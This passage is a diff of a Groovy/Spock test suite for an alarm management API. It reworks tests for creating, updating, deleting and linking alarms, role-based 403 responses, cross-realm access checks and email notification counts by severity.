-        regularUserResource.createAlarm(null, new Alarm().setTitle("title").setContent("content").setSeverity(Severity.MEDIUM).setStatus(Alarm.Status.ACKNOWLEDGED).setRealm(MASTER_REALM), null)
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-    }
-
-    // Get alarms as admin
-    def "should return created alarms"() {
-        when: "five alarms are added"
-        adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        adminResource.createAlarm(null, new Alarm().setTitle('alarm 2').setContent('content').setStatus(Alarm.Status.ACKNOWLEDGED).setSeverity(Severity.MEDIUM).setRealm(MASTER_REALM), null)
-        adminResource.createAlarm(null, new Alarm().setTitle('alarm 3').setContent('content').setStatus(Alarm.Status.CLOSED).setSeverity(Severity.HIGH).setRealm(MASTER_REALM), null)
-        adminResource.createAlarm(null, new Alarm().setTitle('alarm 4').setContent('content').setStatus(Alarm.Status.IN_PROGRESS).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        adminResource.createAlarm(null, new Alarm().setTitle('alarm 5').setContent('content').setStatus(Alarm.Status.RESOLVED).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        def alarms = adminResource.getAlarms(null, MASTER_REALM, null, null, null)
-
-        then: "five alarm can be retrieved"
-        alarms != null
-        alarms.size() == 5
-
-        and: "each single alarm can also be retrieved"
-        for (alarm in alarms) {
-            assert adminResource.getAlarm(null, alarm.id) != null
-        }
-    }
-
-    // Get alarms without read:alarm role
-    def "should not return alarms"() {
-        when:
-        regularUserResource.getAlarms(null, MASTER_REALM, null, null, null)
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when:
-        regularUserResource.getAlarm(null, 1L)
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-    }
-
-    // Update alarm as admin
-    @Unroll
-    def "should update an alarm with title '#title', content '#content', severity '#severity', status '#status' and assigneeId '#assigneeId'"() {
-        when:
-        def alarm = adminResource.createAlarm(null, new Alarm().setTitle('Updatable alarm').setContent('Updatable content').setStatus(Alarm.Status.CLOSED).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        adminResource.updateAlarm(null, alarm.id, new SentAlarm().setTitle(title).setContent(content).setRealm(MASTER_REALM).setSeverity(severity).setStatus(status).setAssigneeId(assigneeId))
-        def updated = adminResource.getAlarms(null, MASTER_REALM, null, null, null)[0]
-
-        then:
-        updated != null
-        updated.title == title
-        updated.content == content
-        updated.severity == severity
-        updated.status == status
-        updated.assigneeId == assigneeId
-
-        where:
-        title           | content               | severity        | status              | assigneeId
-        "Updated Alarm" | "Test Description"    | Severity.HIGH   | Alarm.Status.OPEN   | null
-        "Another Alarm" | "Updated Description" | Severity.MEDIUM | Alarm.Status.CLOSED | keycloakTestSetup.testuser1Id
-    }
-
-    // Update alarm as an new super user in other realm
-    @Unroll
-    def "should update an alarm with title '#title', content '#content', severity '#severity', status '#status' and assigneeId '#assigneeId' as an new super user in other realm"() {
-        when:
-        def alarm = superAdminResource.createAlarm(null, new Alarm().setTitle('Updatable alarm').setContent('Updatable content').setStatus(Alarm.Status.CLOSED).setSeverity(Severity.LOW).setRealm(keycloakTestSetup.realmBuilding.name), null)
-        superAdminResource.updateAlarm(null, alarm.id, new SentAlarm().setTitle(title).setContent(content).setRealm(keycloakTestSetup.realmBuilding.name).setSeverity(severity).setStatus(status).setAssigneeId(assigneeId))
-        def updated = superAdminResource.getAlarms(null, keycloakTestSetup.realmBuilding.name, null, null, null)[0]
-
-        then:
-        updated != null
-        updated.title == title
-        updated.content == content
-        updated.severity == severity
-        updated.status == status
-        updated.assigneeId == assigneeId
-
-        where:
-        title           | content               | severity        | status              | assigneeId
-        "Updated Alarm" | "Test Description"    | Severity.HIGH   | Alarm.Status.OPEN   | null
-        "Another Alarm" | "Updated Description" | Severity.MEDIUM | Alarm.Status.CLOSED | keycloakTestSetup.testuser1Id
-    }
-
-    @Unroll
-    def "should not update an alarm with id 0"() {
-        when:
-        adminResource.updateAlarm(null, 0, new SentAlarm().setTitle('title').setContent('content').setSeverity(Severity.LOW).setStatus(Alarm.Status.OPEN))
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-    }
-
-    // Update alarm without write:alarm role
-    @Unroll
-    def "should not update an alarm with title '#title', content '#content', severity '#severity', and status '#status'"() {
-        when:
-        def alarm = adminResource.createAlarm(null, new Alarm().setTitle('Some alarm').setContent('Some content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        regularUserResource.updateAlarm(null, alarm.id, new SentAlarm().setTitle(title).setContent(content).setSeverity(severity).setStatus(status))
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        where:
-        title           | content               | severity        | status
-        "Updated Alarm" | "Test Description"    | Severity.HIGH   | Alarm.Status.OPEN
-        "Another Alarm" | "Updated Description" | Severity.MEDIUM | Alarm.Status.CLOSED
-    }
-
-    // Delete alarm without write:alarm role
-    def "should not delete alarm without proper permissions"() {
-        when:
-        adminResource.createAlarm(null, new Alarm().setTitle('Some alarm').setContent('Some content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        def alarm = adminResource.getAlarms(null, MASTER_REALM, null, null, null)[0]
-        regularUserResource.removeAlarm(null, alarm.id)
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-    }
-
-    // Delete alarms without write:alarm role
-    def "should not delete alarms without proper permissions"() {
-        when:
-        adminResource.createAlarm(null, new Alarm().setTitle('Some alarm').setContent('Some content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        adminResource.createAlarm(null, new Alarm().setTitle('Another alarm').setContent('More content').setStatus(Alarm.Status.IN_PROGRESS).setSeverity(Severity.MEDIUM).setRealm(MASTER_REALM), null)
-        def alarms = adminResource.getAlarms(null, MASTER_REALM, null, null, null)
-        regularUserResource.removeAlarms(null, (List<Long>) alarms.collect { it.id })
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-    }
-
-    // Delete alarms from another realm as non-super-user
-    def "should not bulk delete alarms from another realm"() {
-        given:
-        def masterAlarm = adminResource.createAlarm(null, new Alarm("Master alarm", "Master content", Severity.MEDIUM, null, MASTER_REALM), null)
-
-        when:
-        buildingUserResource.removeAlarms(null, [masterAlarm.id])
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        and:
-        adminResource.getAlarm(null, masterAlarm.id) != null
-
-        when:
-        buildingUserResource.getAlarm(null, masterAlarm.id)
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        when:
-        buildingUserResource.removeAlarm(null, masterAlarm.id)
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-    }
-
-    // Delete alarms in a mixed-realm bulk request as non-super-user
-    def "should not bulk delete any alarms when one alarm belongs to another realm"() {
-        given:
-        def buildingRealm = keycloakTestSetup.realmBuilding.name
-        def buildingAlarm = buildingUserResource.createAlarm(null, new Alarm("Building alarm", "Building content", Severity.MEDIUM, null, buildingRealm), null)
-        def masterAlarm = adminResource.createAlarm(null, new Alarm("Master alarm", "Master content", Severity.MEDIUM, null, MASTER_REALM), null)
-
-        when:
-        buildingUserResource.removeAlarms(null, [buildingAlarm.id, masterAlarm.id])
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            return true
-        }
-
-        and:
-        buildingUserResource.getAlarm(null, buildingAlarm.id) != null
-        adminResource.getAlarm(null, masterAlarm.id) != null
-    }
-
-    // Delete empty or null alarms
-    def "should not delete null or empty alarms"() {
-        when:
-        adminResource.removeAlarm(null, 0)
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when:
-        adminResource.removeAlarms(null, [])
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when:
-        adminResource.removeAlarms(null, [null])
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-    }
-
-    // Delete invalid alarms
-    def "should not delete alarms with invalid ID"() {
-        when:
-        adminResource.removeAlarm(null, -1L)
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-
-        when:
-        adminResource.removeAlarms(null, [-1L, 0L, 1L])
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
-    }
-
-    // Delete non-exising alarms
-    def "should not delete non-existing alarms"() {
-        when:
-        adminResource.removeAlarm(null, 1L)
-
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-
-        when:
-        adminResource.removeAlarms(null, [1L, 2L, 3L])
-
-        then:
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            return true
-        }
-    }
-
-    // Delete one alarm as admin
-    def "should delete one alarm as admin"() {
-        when:
-        for (int i = 0; i < 2; i++) {
-            adminResource.createAlarm(null, new Alarm("Alarm " + i, "Content " + i, Severity.MEDIUM, null, MASTER_REALM), null)
-        }
-        def delete = adminResource.getAlarms(null, MASTER_REALM, null, null, null)[0]
-        adminResource.removeAlarm(null, delete.id)
-
-        then: "returns some alarms but not the deleted alarm"
-        def alarms = adminResource.getAlarms(null, MASTER_REALM, null, null, null)
-        alarms.find { it.id == delete.id } == null
-        alarms.length > 0
-    }
-
-    // Delete one alarm as an super user in other realm
-    def "should delete one alarm as new super user in other realm"() {
-        when:
-        for (int i = 0; i < 2; i++) {
-            superAdminResource.createAlarm(null, new Alarm("Alarm " + i, "Content " + i, Severity.MEDIUM, null, keycloakTestSetup.realmBuilding.name), null)
-        }
-        def delete = superAdminResource.getAlarms(null, keycloakTestSetup.realmBuilding.name, null, null, null)[0]
-        superAdminResource.removeAlarm(null, delete.id)
-
-        then: "returns some alarms but not the deleted alarm"
-        def alarms = superAdminResource.getAlarms(null, keycloakTestSetup.realmBuilding.name, null, null, null)
-        alarms.find { it.id == delete.id } == null
-        alarms.length > 0
-    }
-
-    // Delete multiple alarms as admin
-    def "should delete multiple alarms as admin"() {
-        when:
-        for (int i = 0; i < 2; i++) {
-            adminResource.createAlarm(null, new Alarm("Alarm " + i, "Content " + i, Severity.MEDIUM, null, MASTER_REALM), null)
-        }
-        def alarms = adminResource.getAlarms(null, MASTER_REALM, null, null, null)
-        adminResource.removeAlarms(null, (List<Long>) alarms.collect { it.id })
-
-        then: "returns no alarms"
-        adminResource.getAlarms(null, MASTER_REALM, null, null, null).length == 0
-    }
-
-    // Delete multiple alarms as super user in other realm
-    def "should delete multiple alarms as super user in other realm"() {
-        when:
-        for (int i = 0; i < 2; i++) {
-            superAdminResource.createAlarm(null, new Alarm("Alarm " + i, "Content " + i, Severity.MEDIUM, null, keycloakTestSetup.realmBuilding.name), null)
-        }
-        def alarms = superAdminResource.getAlarms(null, keycloakTestSetup.realmBuilding.name, null, null, null)
+    notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockPushNotificationHandler)
+  }
+
+  def cleanup() {
+    // Remove all alarms
+    [MASTER_REALM, keycloakTestSetup.realmBuilding.name].each { realm ->
+      def alarms = superAdminResource.getAlarms(null, realm, null, null, null)
+      if (alarms.length> 0) {
         superAdminResource.removeAlarms(null, (List<Long>) alarms.collect { it.id })
-
-        then: "returns no alarms"
-        superAdminResource.getAlarms(null, keycloakTestSetup.realmBuilding.name, null, null, null).length == 0
+      }
     }
 
-    // Get open alarms
-    def "should get open alarms"() {
-        when: "two open and one closed alarms are added"
-        adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        adminResource.createAlarm(null, new Alarm().setTitle('alarm 2').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        adminResource.createAlarm(null, new Alarm().setTitle('alarm 3').setContent('content').setStatus(Alarm.Status.CLOSED).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        def openAlarms = adminResource.getAlarms(null, MASTER_REALM, Alarm.Status.OPEN, null, null)
+    // Clear notifications
+    notificationMessages.clear()
+  }
 
-        then: "returns 2 open alarms"
-        openAlarms.size() == 2
+  // Create alarm as new super user in other realm
+  @Unroll
+  def "should create an alarm with title '#title', content '#content', severity '#severity', assigneeId '#assigneeId' and '#emailNotifications' emailNotifications as new super user in other realm"() {
+    when: "an alarm is created"
+    def input = new Alarm(title, content, severity, assigneeId, keycloakTestSetup.realmBuilding.name)
+    def alarm = superAdminResource.createAlarm(null, input, null)
+
+    then:
+    alarm != null
+    alarm.title == title
+    alarm.content == content
+    alarm.severity == severity
+    alarm.assigneeId == assigneeId
+    alarm.status == Alarm.Status.OPEN
+
+    and:
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 1, delay: 0.2)
+    conditions.eventually {
+      assert notificationMessages.size() == emailNotifications
     }
 
-    // Linking alarms as admin
-    def "should be able to link alarms to assets as admin"() {
-        when: "two alarms are added"
-        def alarm1 = adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        def alarm2 = adminResource.createAlarm(null, new Alarm().setTitle('alarm 2').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    where:
+    title | content | severity | assigneeId | emailNotifications
+    "Low Alarm" | "Test Description" | Severity.LOW | null | 0
+    "Low Assigned 1 Alarm" | "Test Description" | Severity.LOW | keycloakTestSetup.testuser1Id | 0
+    "Low Assigned 2 Alarm" | "Test Description" | Severity.LOW | alarmsReadWriteUserId | 0
+    "Medium Unassigned Alarm" | "Another Description" | Severity.MEDIUM | null | 0
+    "Medium Assigned 1 Alarm" | "Assigned Description" | Severity.MEDIUM | keycloakTestSetup.testuser1Id | 0
+    "Medium Assigned 2 Alarm" | "Assigned Description" | Severity.MEDIUM | alarmsReadWriteUserId | 0
+    "High Unassigned Alarm" | "Critical Description" | Severity.HIGH | null | 1
+    "High Assigned 1 Alarm" | "Critical Description" | Severity.HIGH | keycloakTestSetup.testuser1Id | 0
+    "High Assigned 2 Alarm" | "Critical Description" | Severity.HIGH | alarmsReadWriteUserId | 1
+  }
 
-        then: "both can be linked to an asset"
-        adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm1.id, managerTestSetup.smartOfficeId)])
-        adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm2.id, managerTestSetup.smartOfficeId)])
+  // Create alarm as admin
+  @Unroll
+  def "should create an alarm with title '#title', content '#content', severity '#severity', assigneeId '#assigneeId' and '#emailNotifications' emailNotifications"() {
+    when: "an alarm is created"
+    def input = new Alarm(title, content, severity, assigneeId, MASTER_REALM)
+    def alarm = adminResource.createAlarm(null, input, null)
 
-        when: "the alarm asset links are retrieved"
-        def alarm1Links = adminResource.getAssetLinks(null, alarm1.id, MASTER_REALM)
-        def alarm2Links = adminResource.getAssetLinks(null, alarm2.id, MASTER_REALM)
+    then:
+    alarm != null
+    alarm.title == title
+    alarm.content == content
+    alarm.severity == severity
+    alarm.assigneeId == assigneeId
+    alarm.status == Alarm.Status.OPEN
 
-        then: "the alarm asset links match"
-        alarm1Links.size() == 1
-        alarm1Links.get(0).id.alarmId == alarm1.id
-        alarm1Links.get(0).id.assetId == managerTestSetup.smartOfficeId
-        alarm1Links.get(0).id.realm == MASTER_REALM
-        alarm2Links.size() == 1
-        alarm2Links.get(0).id.alarmId == alarm2.id
-        alarm2Links.get(0).id.assetId == managerTestSetup.smartOfficeId
-        alarm2Links.get(0).id.realm == MASTER_REALM
-
-        when: "more alarm asset links are added"
-        adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm1.id, managerTestSetup.lobbyId)])
-        adminResource.setAssetLinks(null, [new AlarmAssetLink(MASTER_REALM, alarm2.id, managerTestSetup.lobbyId)])
-        alarm1Links = adminResource.getAssetLinks(null, alarm1.id, MASTER_REALM)
-        alarm2Links = adminResource.getAssetLinks(null, alarm2.id, MASTER_REALM)
-
-        then: "these alarm asset links also match"
-        alarm1Links.size() == 2
-        alarm1Links.get(0).id.alarmId == alarm1.id
-        alarm1Links.get(0).id.assetId == managerTestSetup.lobbyId
-        alarm1Links.get(0).id.realm == MASTER_REALM
-        alarm1Links.get(1).id.alarmId == alarm1.id
-        alarm1Links.get(1).id.assetId == managerTestSetup.smartOfficeId
-        alarm1Links.get(1).id.realm == MASTER_REALM
-        alarm2Links.size() == 2
-        alarm2Links.get(0).id.alarmId == alarm2.id
-        alarm2Links.get(0).id.assetId == managerTestSetup.lobbyId
-        alarm2Links.get(0).id.realm == MASTER_REALM
-        alarm2Links.get(1).id.alarmId == alarm2.id
-        alarm2Links.get(1).id.assetId == managerTestSetup.smartOfficeId
-        alarm2Links.get(1).id.realm == MASTER_REALM
+    and:
+    def conditions = new PollingConditions(timeout: 10, initialDelay: 1, delay: 0.2)
+    conditions.eventually {
+      assert notificationMessages.size() == emailNotifications
     }
 
-    def "should reject asset links for multiple alarms in one request"() {
-        given:
-        def alarm1 = adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
-        def alarm2 = adminResource.createAlarm(null, new Alarm().setTitle('alarm 2').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    where:
+    title | content | severity | assigneeId | emailNotifications
+    "Low Alarm" | "Test Description" | Severity.LOW | null | 0
+    "Low Assigned 1 Alarm" | "Test Description" | Severity.LOW | keycloakTestSetup.testuser1Id | 0
+    "Low Assigned 2 Alarm" | "Test Description" | Severity.LOW | alarmsReadWriteUserId | 0
+    "Medium Unassigned Alarm" | "Another Description" | Severity.MEDIUM | null | 0
+    "Medium Assigned 1 Alarm" | "Assigned Description" | Severity.MEDIUM | keycloakTestSetup.testuser1Id | 0
+    "Medium Assigned 2 Alarm" | "Assigned Description" | Severity.MEDIUM | alarmsReadWriteUserId | 0
+    "High Unassigned Alarm" | "Critical Description" | Severity.HIGH | null | 1
+    "High Assigned 1 Alarm" | "Critical Description" | Severity.HIGH | keycloakTestSetup.testuser1Id | 0
+    "High Assigned 2 Alarm" | "Critical Description" | Severity.HIGH | alarmsReadWriteUserId | 1
+  }
 
-        when:
-        adminResource.setAssetLinks(null, [
-                new AlarmAssetLink(MASTER_REALM, alarm1.id, managerTestSetup.smartOfficeId),
-                new AlarmAssetLink(MASTER_REALM, alarm2.id, managerTestSetup.smartOfficeId)
-        ])
+  @Unroll
+  def "should create an alarm with title '#title', content '#content', severity '#severity', and source '#source'"() {
+    when: "an alarm is created"
+    def input = new Alarm().setTitle(title).setContent(content).setSeverity(severity).setStatus(Alarm.Status.OPEN).setRealm(MASTER_REALM)
+    def alarm = adminResource.createAlarm(null, input, null)
 
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+    then:
+    alarm != null
+    alarm.title == title
+    alarm.content == content
+    alarm.severity == severity
+    alarm.status == Alarm.Status.OPEN
+    alarm.source == source
 
-        and:
-        adminResource.getAssetLinks(null, alarm1.id, MASTER_REALM).isEmpty()
-        adminResource.getAssetLinks(null, alarm2.id, MASTER_REALM).isEmpty()
+    where:
+    title | content | severity | source
+    "Test Alarm" | "Test Description" | Severity.LOW | Alarm.Source.MANUAL
+    "Another Alarm" | "Another Description" | Severity.MEDIUM | Alarm.Source.MANUAL
+    "Critical Alarm" | "Critical Description" | Severity.HIGH | Alarm.Source.MANUAL
+  }
+
+  @Unroll
+  def "should not create an alarm with title '#title', content '#content', severity '#severity', and status '#status'"() {
+    when:
+    adminResource.createAlarm(null, new Alarm().setTitle(title).setContent(content).setSeverity(severity).setStatus(status).setRealm(MASTER_REALM), null)
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
     }
 
-    // Linking alarms across realms
-    def "should reject asset links for multiple realms in one request"() {
-        given:
-        def buildingRealm = keycloakTestSetup.realmBuilding.name
-        def alarm = buildingUserResource.createAlarm(null, new Alarm("Building alarm", "Building content", Severity.MEDIUM, null, buildingRealm), null)
-        def links = [
-                new AlarmAssetLink(buildingRealm, alarm.id, managerTestSetup.apartment1Id),
-                new AlarmAssetLink(MASTER_REALM, alarm.id, managerTestSetup.smartOfficeId)
-        ]
+    where:
+    title | content | severity | status
+    null | "Test Description" | Severity.LOW | Alarm.Status.OPEN
+    "Another Test Alarm" | "Another Description" | null | Alarm.Status.RESOLVED
+  }
 
-        when:
-        buildingUserResource.setAssetLinks(null, links)
+  // Create alarm without write:alarm role
+  def "should not create an alarm as regular user"() {
+    when:
+    regularUserResource.createAlarm(null, new Alarm().setTitle("title").setContent("content").setSeverity(Severity.MEDIUM).setStatus(Alarm.Status.ACKNOWLEDGED).setRealm(MASTER_REALM), null)
 
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
 
-        and:
-        buildingUserResource.getAssetLinks(null, alarm.id, buildingRealm).isEmpty()
-        superAdminResource.getAssetLinks(null, alarm.id, MASTER_REALM).isEmpty()
+  // Get alarms as admin
+  def "should return created alarms"() {
+    when: "five alarms are added"
+    adminResource.createAlarm(null, new Alarm().setTitle('alarm 1').setContent('content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    adminResource.createAlarm(null, new Alarm().setTitle('alarm 2').setContent('content').setStatus(Alarm.Status.ACKNOWLEDGED).setSeverity(Severity.MEDIUM).setRealm(MASTER_REALM), null)
+    adminResource.createAlarm(null, new Alarm().setTitle('alarm 3').setContent('content').setStatus(Alarm.Status.CLOSED).setSeverity(Severity.HIGH).setRealm(MASTER_REALM), null)
+    adminResource.createAlarm(null, new Alarm().setTitle('alarm 4').setContent('content').setStatus(Alarm.Status.IN_PROGRESS).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    adminResource.createAlarm(null, new Alarm().setTitle('alarm 5').setContent('content').setStatus(Alarm.Status.RESOLVED).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    def alarms = adminResource.getAlarms(null, MASTER_REALM, null, null, null)
+
+    then: "five alarm can be retrieved"
+    alarms != null
+    alarms.size() == 5
+
+    and: "each single alarm can also be retrieved"
+    for (alarm in alarms) {
+      assert adminResource.getAlarm(null, alarm.id) != null
+    }
+  }
+
+  // Get alarms without read:alarm role
+  def "should not return alarms"() {
+    when:
+    regularUserResource.getAlarms(null, MASTER_REALM, null, null, null)
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "should reject asset links pointing to assets from another realm"() {
-        given:
-        def buildingRealm = keycloakTestSetup.realmBuilding.name
-        def alarm = buildingUserResource.createAlarm(null, new Alarm("Building alarm", "Building content", Severity.MEDIUM, null, buildingRealm), null)
+    when:
+    regularUserResource.getAlarm(null, 1L)
 
-        when:
-        buildingUserResource.setAssetLinks(null, [new AlarmAssetLink(buildingRealm, alarm.id, managerTestSetup.smartOfficeId)])
+    then:
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
 
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+  // Update alarm as admin
+  @Unroll
+  def "should update an alarm with title '#title', content '#content', severity '#severity', status '#status' and assigneeId '#assigneeId'"() {
+    when:
+    def alarm = adminResource.createAlarm(null, new Alarm().setTitle('Updatable alarm').setContent('Updatable content').setStatus(Alarm.Status.CLOSED).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    adminResource.updateAlarm(null, alarm.id, new SentAlarm().setTitle(title).setContent(content).setRealm(MASTER_REALM).setSeverity(severity).setStatus(status).setAssigneeId(assigneeId))
+    def updated = adminResource.getAlarms(null, MASTER_REALM, null, null, null)[0]
 
-        and:
-        buildingUserResource.getAssetLinks(null, alarm.id, buildingRealm).isEmpty()
+    then:
+    updated != null
+    updated.title == title
+    updated.content == content
+    updated.severity == severity
+    updated.status == status
+    updated.assigneeId == assigneeId
+
+    where:
+    title | content | severity | status | assigneeId
+    "Updated Alarm" | "Test Description" | Severity.HIGH | Alarm.Status.OPEN | null
+    "Another Alarm" | "Updated Description" | Severity.MEDIUM | Alarm.Status.CLOSED | keycloakTestSetup.testuser1Id
+  }
+
+  // Update alarm as an new super user in other realm
+  @Unroll
+  def "should update an alarm with title '#title', content '#content', severity '#severity', status '#status' and assigneeId '#assigneeId' as an new super user in other realm"() {
+    when:
+    def alarm = superAdminResource.createAlarm(null, new Alarm().setTitle('Updatable alarm').setContent('Updatable content').setStatus(Alarm.Status.CLOSED).setSeverity(Severity.LOW).setRealm(keycloakTestSetup.realmBuilding.name), null)
+    superAdminResource.updateAlarm(null, alarm.id, new SentAlarm().setTitle(title).setContent(content).setRealm(keycloakTestSetup.realmBuilding.name).setSeverity(severity).setStatus(status).setAssigneeId(assigneeId))
+    def updated = superAdminResource.getAlarms(null, keycloakTestSetup.realmBuilding.name, null, null, null)[0]
+
+    then:
+    updated != null
+    updated.title == title
+    updated.content == content
+    updated.severity == severity
+    updated.status == status
+    updated.assigneeId == assigneeId
+
+    where:
+    title | content | severity | status | assigneeId
+    "Updated Alarm" | "Test Description" | Severity.HIGH | Alarm.Status.OPEN | null
+    "Another Alarm" | "Updated Description" | Severity.MEDIUM | Alarm.Status.CLOSED | keycloakTestSetup.testuser1Id
+  }
+
+  @Unroll
+  def "should not update an alarm with id 0"() {
+    when:
+    adminResource.updateAlarm(null, 0, new SentAlarm().setTitle('title').setContent('content').setSeverity(Severity.LOW).setStatus(Alarm.Status.OPEN))
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
+  }
+
+  // Update alarm without write:alarm role
+  @Unroll
+  def "should not update an alarm with title '#title', content '#content', severity '#severity', and status '#status'"() {
+    when:
+    def alarm = adminResource.createAlarm(null, new Alarm().setTitle('Some alarm').setContent('Some content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    regularUserResource.updateAlarm(null, alarm.id, new SentAlarm().setTitle(title).setContent(content).setSeverity(severity).setStatus(status))
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
     }
 
-    def "should reject asset links pointing to alarms from another realm"() {
-        given:
-        def buildingRealm = keycloakTestSetup.realmBuilding.name
-        def masterAlarm = adminResource.createAlarm(null, new Alarm("Master alarm", "Master content", Severity.MEDIUM, null, MASTER_REALM), null)
+    where:
+    title | content | severity | status
+    "Updated Alarm" | "Test Description" | Severity.HIGH | Alarm.Status.OPEN
+    "Another Alarm" | "Updated Description" | Severity.MEDIUM | Alarm.Status.CLOSED
+  }
 
-        when:
-        buildingUserResource.setAssetLinks(null, [new AlarmAssetLink(buildingRealm, masterAlarm.id, managerTestSetup.apartment1Id)])
+  // Delete alarm without write:alarm role
+  def "should not delete alarm without proper permissions"() {
+    when:
+    adminResource.createAlarm(null, new Alarm().setTitle('Some alarm').setContent('Some content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    def alarm = adminResource.getAlarms(null, MASTER_REALM, null, null, null)[0]
+    regularUserResource.removeAlarm(null, alarm.id)
 
-        then:
-        WebApplicationException ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            return true
-        }
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
 
-        and:
-        buildingUserResource.getAssetLinks(null, masterAlarm.id, buildingRealm).isEmpty()
+  // Delete alarms without write:alarm role
+  def "should not delete alarms without proper permissions"() {
+    when:
+    adminResource.createAlarm(null, new Alarm().setTitle('Some alarm').setContent('Some content').setStatus(Alarm.Status.OPEN).setSeverity(Severity.LOW).setRealm(MASTER_REALM), null)
+    adminResource.createAlarm(null, new Alarm().setTitle('Another alarm').setContent('More content').setStatus(Alarm.Status.IN_PROGRESS).setSeverity(Severity.MEDIUM).setRealm(MASTER_REALM), null)
+    def alarms = adminResource.getAlarms(null, MASTER_REALM, null, null, null)
+    regularUserResource.removeAlarms(null, (List<Long>) alarms.collect { it.id })
+
+    then:
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
+
+  // Delete alarms from another realm as non-super-user
+  def "should not bulk delete alarms from another realm"() {
+    given:
